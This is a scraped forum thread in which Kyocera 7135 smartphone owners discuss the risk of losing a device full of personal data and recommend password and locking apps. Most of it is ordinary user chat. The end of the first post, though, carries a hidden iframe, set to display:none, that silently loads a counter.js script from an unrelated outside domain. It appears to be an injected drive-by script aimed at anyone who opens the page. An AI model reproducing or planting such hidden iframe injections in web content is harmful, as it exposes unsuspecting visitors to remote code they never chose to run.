+ Reply to Thread
Results 1 to 11 of 11
  1. #1
    Registered User
    Join Date
    03-30-2003
    Posts
    13

    How much do people worry about security?

    I've been slowly working my 7135 into my life, putting more and more data on it, but started thinking, what would happen if I lost it? That's a lot of sensitive info to have fall into some stranger's hands. I've been trying to research software to help me sleep better, but don't know what's good out there. PDASecure looks like it's good for handheld security; EncryptIt and others look good for storing passwords. I just don't know (yet) how well they run on the 7135, especially PDASecure. Can I answer the phone with it?

    Is anyone else as concerned about things like this as I am, or am I just paranoid (or both)? What have other 7135 users found useful / works well? I'm itching to centralize all my info.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    I do not lock the phone or pda, but use Vault to keep sensitive information (credit card numbers, passwords, etc.) secure. I also keep sensitive documents on a sperate SD card which I keep separate from the phone.

  3. #3
    Registered User TMWebSites's Avatar
    Join Date
    08-25-2003
    Location
    San Diego
    Posts
    219
    I use SplashID to store all kinds of private and sensitive information that I need to carry with me. The whole reason I got a smartphone in the first place. On my 6035, I used the PDA locking function for security since it was easy to do. The 7135 is not so easy to lock and the automatic locking setting doesn't work reliably for me. So I got SplashID and it's a lot more secure than my old scheme. It works flawlessly on the 7135 for me and also has a desktop component that integrates well with the Palm Desktop.

    http://www.splashid.com/
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

  4. #4
    ep
    ep is offline
    Registered User ep's Avatar
    Join Date
    08-28-2001
    Posts
    186
    I use GNU Keyring because I love GNU! (even though it's not technically GNU, it's still OSS).
    http://gnukeyring.sourceforge.net/

    Also, there is a conduit for jpilot which is muy cool. That way, I can cut 'n paste my passwords on my desktop (I know, I know, cut and paste could be insecure, but if someone rooted my box, I have more problems anyway).

    http://www.jpilot.org
    --ep

  5. #5
    Registered User
    Join Date
    08-24-2001
    Posts
    281
    Originally posted by tmwebsites
    I use SplashID to store all kinds of private and sensitive information that I need to carry with me. The whole reason I got a smartphone in the first place. On my 6035, I used the PDA locking function for security since it was easy to do. The 7135 is not so easy to lock and the automatic locking setting doesn't work reliably for me. So I got SplashID and it's a lot more secure than my old scheme. It works flawlessly on the 7135 for me and also has a desktop component that integrates well with the Palm Desktop.

    http://www.splashid.com/
    Nick, I get an error when I try this link, is it correct?

    --terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

  6. #6
    pjp
    pjp is offline
    Registered User
    Join Date
    12-23-2002
    Posts
    5

    Be Worried

    Originally posted by rodionpunk
    I've been slowly working my 7135 into my life, putting more and more data on it, but started thinking, what would happen if I lost it? That's a lot of sensitive info to have fall into some stranger's hands.
    It happens, and when it happens, it is a very bad feeling. I left my 7135 in a cab recently, and no one appears to have made any attempt to return it. Fortunately, Lockline (VZW's insurance administrator in Illinois) replaced mine (although not without a fair amount of stress and aggravation -- perhaps the subject for another thread). Now I have a new one, but theoretically ALL of my data is in someone else's hands. I try to just not think about it too much.

    At any rate, I am understandably very interested in some more discussion on this topic. I would love to know what programs other than those mentioned here already people are using. My preference is to have something that will lock the entire device after X amount of minutes/hours/etc, so I'm not entering a password every time I need it. Right now I am using the built-in security app, but I think there must be something better out there.

    Thanks in advance for any input.

  7. #7
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912

    Re: Be Worried

    Originally posted by pjp
    My preference is to have something that will lock the entire device after X amount of minutes/hours/etc, so I'm not entering a password every time I need it. Right now I am using the built-in security app, but I think there must be something better out there.
    I also use the built-in but I noticed a quirk that causes it to lock occasionally after I open it up after 10-20 minutes even though it is set to autolock after 5 hours. Anyone else notice this?

    I'm trying it with the new firmware so it might have been fixed.

  8. #8
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Who needs security on the 7135 anyway? As often as some people around here say it crashes, nobody is going to be able to get to your data anyway :p

    Just keeping it light on a Friday night :clap

    I do keep everything on my 7135 though... one of these days I'll have to put some thought into that. But there is no way I'm ever losing it... and if somebody tries to steal it they are going to have to take me too! :BigKnife:

    p.s. I can't believe that some of these smilies are case-sensative! Makes the quick reply pretty tough to use sometimes
    Please visit my picture site: Robert-O-Rama :)

  9. #9
    Registered User TMWebSites's Avatar
    Join Date
    08-25-2003
    Location
    San Diego
    Posts
    219
    Originally posted by WORBC
    Nick, I get an error when I try this link, is it correct?
    I just clicked on it and it worked for me. You could try this link instead: http://www.splashdata.com/splashid/index.htm
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

  10. #10
    Registered User
    Join Date
    08-24-2001
    Posts
    281
    thanks Nick,

    Security for handhelds and notebook computers (the Wall Stree Joun has had several articles over the past two months on this issue) is a big issue and getting bigger. One thing the article did point out was that some people's PDA were/are being trageted for the infomation they have within. I travel lots and have become very aware of the folks seated next and behind me on airplanes whom like to look over to see what's on your computer and such. I'm always double and tripple checking to see where my phone is and to make sure I have a firm grasp on it.

    thanks for the info...

    --terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

  11. #11
    psf
    psf is offline
    Registered User
    Join Date
    02-17-2003
    Posts
    4
    I have been using Cloak (v2) for a while now, with no problems. It's available from Chapura (the PocketMirror people).

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts